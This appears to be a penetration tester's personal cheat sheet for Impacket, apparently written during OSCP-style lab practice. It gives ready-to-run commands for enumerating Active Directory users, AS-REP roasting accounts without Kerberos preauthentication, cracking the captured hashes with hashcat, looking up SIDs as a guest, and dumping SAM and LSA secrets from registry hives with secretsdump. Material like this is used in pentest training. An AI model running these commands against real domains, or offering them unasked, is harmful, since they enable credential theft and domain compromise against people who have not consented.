# impacket

### getaduser
- With creds, pull all the users (oscp sv-file01)
GetADUsers.py -all -dc-ip 10.11.1.20 '<domain>/<user>'

### getnpnusers
https://cheatsheet.haax.fr/windows-systems/exploitation/kerberos/

- User -no-pass if account has UF_DONT_REQUIRE_PREAUTH
`GetNPUsers.py 'dante.admin/jbercov' -no-pass -dc-ip 172.16.2.5`



`GetNPUsers.py spookysec.local/ -usersfile valid_usernames.txt -dc-ip $IP -no-pass -format hashcat -outputfile asreproastable.log`

`hashcat -m 18200 aseroastable.log passwordlist.txt`

### getuserspns

### lookupsid
- requires valid user

lookupsid.py guest:@dc
### secretsdump
`secretsdump.py -sam sam -security security -system system LOCAL`